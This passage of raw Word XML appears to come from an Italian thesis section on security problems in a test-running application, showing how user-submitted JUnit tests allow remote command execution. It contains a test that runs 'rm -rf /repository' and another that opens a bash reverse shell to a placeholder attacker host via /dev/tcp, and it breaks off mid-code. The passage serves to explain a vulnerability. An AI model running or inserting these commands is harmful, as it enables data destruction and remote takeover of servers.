    <w:p w14:paraId="17FD53AD" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="3B136C6D" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="1AC14DC0" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="49593F64" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="082D0A4D" w14:textId="11ABAD5F" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00A710E8" w:rsidP="00A710E8">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc148195758"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>5.3 Problemi di sicurezza</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="16240A43" w14:textId="49E7DB88" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E1508">
      <w:r w:rsidRPr="00715086">
        <w:t>A causa della libertà data all'utente per l'esecuzione di test, l'applicazione risulta estremamente vulnerabile ad attacchi di tipo Remote Command Execution (RCE), che consiste nell'esecuzione di codice arbitrario su un server da una locazione remota.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597768B" w14:textId="7FAA78C3" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E1508">
      <w:r w:rsidRPr="00715086">
        <w:t>Qui è possibile vedere un semplice esempio di come un utente attaccante potrebbe eliminare totalmente la cartella della repository condivisa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551785E6" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> org.junit.Test;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278B880" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> static </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.junit.Assert.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4AC836" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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0BEFA4ED" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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 xml:space="preserve">public </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AppTest</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0396D279" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C150C2D" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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  public void breakRepository(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80F83B" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BFE021" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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      String[] command = {</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"rm"</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"-rf"</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"/repository"</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20060CA9" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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      Process process = new ProcessBuilder(command).start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23206B7D" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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    } catch (</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> e){}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC867D0" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C436263" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6CDECD" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="0055772E"/>
    <w:p w14:paraId="2DD2292E" w14:textId="605FC7B9" w:rsidR="007935E6" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t>Nei casi più gravi un attaccante può anche ottenere una shell remota e prendere il controllo totale del container che esegue i test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F56C6D" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.junit.Test;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024D685E" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.junit.Assert.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA99EA9" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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7C38A24B" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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 xml:space="preserve">public </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AppTest</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7138E" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4175EF40" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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  public void reverseShell(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64683AB9" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA1A832" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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      String[] command = {</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"/bin/bash"</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"-c"</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"exec 5&lt;&gt;/dev/tcp/attackerip/attackerport;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done;"</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE499A" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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      Process process = new ProcessBuilder(command).start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A5EB4" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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    } catch (</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
